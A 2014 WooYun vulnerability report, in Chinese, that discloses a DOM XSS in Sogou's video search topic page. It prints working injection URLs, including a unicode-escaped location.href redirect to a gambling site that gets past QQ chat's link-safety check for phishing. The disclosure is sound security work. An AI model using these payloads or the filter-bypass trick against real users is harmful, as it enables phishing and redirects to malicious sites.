搜狗搜索引擎domxss漏洞可钓鱼(绕过聊天窗口检测QQ提示绿标)

漏洞详情

披露状态:

2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-13: 厂商已经确认,细节仅向厂商公开
2014-02-23: 细节向核心白帽子及相关领域专家公开
2014-03-05: 细节向普通白帽子公开
2014-03-15: 细节向实习白帽子公开
2014-03-30: 细节向公众公开

简要描述:

可挂马钓鱼

详细说明:

在乌云看到这样一个例子:http://wooyun.org/bugs/wooyun-2010-048040

心想找个搜狗的搜索xss 应该能换个邀请码了吧?

找到如下url地址:

http://v.sogou.com/vc/topic.jsp?s_url=[内容可控]

通过一些方法绕出了js

通过一些fuzz测试之后。

http://v.sogou.com/vc/topic.jsp?s_url=http://baidu.com%22}%0aalert(1)%0a//



成功弹出:alert

1.jpg





挺有意思,那么我们试试直接通过location.href的方式跳转看看能不能绿标

构造如下代码:

http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22http://www.phpbug.cn%22%0a//



很是遗憾,竟然没有绿标

2.jpg





通过fuzz之后发现 凡是带有http:// 均会检测,并且拦截一次。

http:/ 不拦截



回到上面的xss,既然知道这样的特性,我们可以利用js转码。

将网页转码之后跳转到我们的钓鱼网站不就完成了吗?



在百度搜了一个菠菜网站:http://www.131333.com/



通过js转码之后加入我们的url

最后生成url地址:

http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0031\u0033\u0031\u0033\u0033\u0033\u002e\u0063\u006f\u006d%22%0a//



回到QQ聊天窗口,这个时候已经绿标。

3.jpg

漏洞证明:

请看详细说明

修复方案:

对传入 uigs_para 变量的值处理一下。不要让他绕出来了

版权声明:转载请注明来源 大牛@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-02-13 14:41

厂商回复:

感谢提供漏洞报告,正在安排修复

最新状态:

暂无


漏洞评价: